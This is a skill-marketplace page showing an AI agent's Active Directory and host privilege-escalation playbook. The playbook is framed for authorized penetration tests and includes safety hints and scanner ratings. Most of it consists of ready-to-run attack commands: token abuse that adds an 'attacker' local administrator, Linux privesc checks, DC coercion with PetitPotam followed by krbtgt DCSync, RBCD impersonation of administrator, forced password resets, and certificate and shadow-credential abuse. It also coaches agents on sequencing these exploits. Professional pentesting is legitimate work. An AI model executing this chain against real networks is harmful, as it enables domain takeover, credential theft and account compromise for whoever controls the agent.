All skills
hardw00t avatar

/network-pentest

@f9bb3b2

Internal network and Active Directory penetration testing skill for corporate environments. Use when performing authorized internal network assessments, AD attack path analysis, lateral movement, privilege escalation, and post-exploitation across Windows/Linux estates. Covers BloodHound, Impacket, NetExec/CrackMapExec, Responder, Rubeus, mimikatz, certipy. Triggers on requests to pentest internal networks, attack AD, perform lateral movement, Kerberoast, DCSync, or escalate privileges.

Use this Skill: https://skilld.dev/gh/hardw00t/ai-security-arsenal/network-pentest

This session only. Nothing lands on disk.

workflowsprivilege_escalation.md

≈1.5k tokens on demand. Your agent reads this file only when SKILL.md points to it.

Workflow: Privilege Escalation

Elevate from user/service context to local SYSTEM/root or from unprivileged domain user to Domain Admin via AD misconfig.

Preconditions

  • Shell or WinRM on target (any user), OR
  • Low-priv domain credential with BloodHound data in hand

Branch A: Local PrivEsc (Windows)

Automated enumeration (parallelizable)

# Drop and run in separate sessions / sub-agents
.\winPEAS.exe > winpeas.txt
powershell -c ". .\PowerUp.ps1; Invoke-AllChecks" > powerup.txt
.\SharpUp.exe > sharpup.txt

Manual priority checks

whoami /priv
whoami /groups
systeminfo
sc qc <suspicious-service>
accesschk.exe /accepteula -uwcqv "Authenticated Users" *

Common vectors

Vector Signal Exploit
SeImpersonatePrivilege held whoami /priv GodPotato / PrintSpoofer
Unquoted service path w/ writable dir wmic service get ... place C:\Program.exe
Weak service ACL accesschk SERVICE_CHANGE_CONFIG sc config to flip binPath
AlwaysInstallElevated reg query ...AlwaysInstallElevated malicious MSI
Stored creds cmdkey /list, DPAPI runas /savecred, dpapi decrypt

Token abuse (SeImpersonate present)

# Modern default — works on all current Windows versions
GodPotato.exe -cmd "cmd /c net localgroup administrators attacker /add"

# PrintSpoofer (Win10 / Server 2016-2019 with Spooler service)
PrintSpoofer.exe -i -c cmd

Branch B: Local PrivEsc (Linux)

# Automated
./linpeas.sh | tee linpeas.txt
./linux-exploit-suggester.sh | tee les.txt

# Manual priority checks
id; sudo -l
find / -perm -4000 -type f 2>/dev/null                 # SUID
getcap -r / 2>/dev/null                                # capabilities
cat /etc/crontab; ls -la /etc/cron.*                   # scheduled
mount | grep -v 'type proc'                            # fstab nosuid check
ls -la /etc/passwd /etc/shadow                         # write access

Common vectors

Vector Signal Exploit
sudo NOPASSWD entry sudo -l GTFOBins for the binary
SUID root binary find -perm -4000 GTFOBins
cap_setuid+ep getcap -r / spawn root shell
Writable /etc/passwd ls -la append UID 0 line
Writable cron script inspect files inject payload
Kernel version n-many CVEs uname -a verified exploit only

Branch C: Domain PrivEsc (low-priv -> DA)

Selection of primitive depends on BloodHound enumeration results. Reason through each candidate before executing.

C1. Kerberoast -> crack -> use service account

Already covered in workflows/credential_attacks.md. If cracked svc account is in a privileged group, skip to dominance.

C2. Unconstrained delegation (non-DC host owned)

# On the owned UD host, monitor for inbound TGTs
Rubeus.exe monitor /interval:5 /nowrap

# Coerce DC$ to authenticate to the UD host
python3 PetitPotam.py <ud_host_ip> <dc_fqdn>
# OR
python3 printerbug.py corp.local/user:pass@dc <ud_host_ip>

# Extract DC$ TGT from Rubeus monitor output, PtT
Rubeus.exe ptt /ticket:<b64_tgt>

# Now DCSync as DC$
secretsdump.py -k -no-pass -just-dc-user krbtgt corp.local/dc

C3. RBCD (write on target computer object + MAQ>0)

# Create attacker-controlled computer
addcomputer.py "corp.local/user:pass" -computer-name 'FAKE01$' \
  -computer-pass 'Fake01!' -dc-ip $DC_IP

# Grant FAKE01$ the ability to act on behalf of anyone to target
rbcd.py -delegate-from 'FAKE01$' -delegate-to 'TARGET$' \
  -action write corp.local/user:pass

# Request TGS for cifs/target as Administrator
getST.py -spn cifs/target.corp.local -impersonate administrator \
  -dc-ip $DC_IP 'corp.local/FAKE01$:Fake01!'

# Use the ticket
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass corp.local/administrator@target.corp.local

C4. ACL abuse (GenericAll/WriteDACL/GenericWrite)

# GenericAll on user -> reset password
net rpc password "target_user" "NewP@ssw0rd!" -U "corp.local/our_user%pass" \
  -S dc.corp.local

# GenericWrite on user -> set SPN -> Kerberoast
# (Python) targetedKerberoast or PowerView Set-DomainObject
targetedKerberoast.py -d corp.local -u our_user -p pass --request-user target_user

C5. ADCS (ESC1/ESC8) — see references/ad_attack_matrix.md

# ESC1: enroll as DA by specifying altName
certipy-ad req -u our_user@corp.local -p pass -dc-ip $DC_IP \
  -target ca.corp.local -ca 'CORP-CA' -template VulnTemplate \
  -upn administrator@corp.local

# Authenticate with the cert to get DA TGT
certipy-ad auth -pfx administrator.pfx -dc-ip $DC_IP

C6. Shadow Credentials (write msDS-KeyCredentialLink)

certipy-ad shadow auto -u our_user@corp.local -p pass \
  -account target_user -dc-ip $DC_IP
# Outputs NT hash of target_user via PKINIT UnPAC-the-hash

Reasoning budget guidance

  • Mechanical enumeration (winpeas/linpeas output parsing): minimal reasoning, pattern-match.
  • Vector selection (which GenericAll to use, which RBCD target): extended thinking pays off — you need to trace blast radius, dependencies, and reversibility before committing.
  • Exploit sequencing (C2 coercion chain): extended thinking required to map each step's preconditions.

Safety hints

  • NEVER run DCSync against a DC without written approval for the specific DC (some customers treat read-only DCs differently).
  • Password reset via GenericAll is destructive — the user's current password is overwritten. Coordinate and prefer Shadow Creds where the original password needs to survive.
  • RBCD and ACL additions must be reverted before engagement end. Keep an acl_changes.log.
  • Avoid skeleton key outside lab — it's a persistence primitive, not a privesc one.

Next workflow

  • DA / krbtgt in hand: workflows/domain_dominance.md

Source: SKILL.md on GitHub

1 alert16d4 checks · Risk SAFE
  • Gen Agent Trust Hub16d

    The network-pentest skill is a highly structured, well-documented resource designed for authorized internal network and Active Directory penetration testing workflows. It provides clear playbooks, references, and configuration templates for using industry-standard security tools. No malicious behaviors, obfuscation techniques, or unauthorized data exfiltration paths were detected.

  • Socket16d

    13 alerts: gptSecurity, gptAnomaly

  • Snyk16d

    Risk: LOW · No issues

  • Runlayer7mo

    1/1 file flagged

Signed by skilld at f9bb3b2. This ties the file your Agent reads to that commit on GitHub. It does not review the instructions.

Last checked against GitHub 2 months ago.

Steadyupdated 6 months ago

README badge

README badge for hardw00t/ai-security-arsenal/network-pentest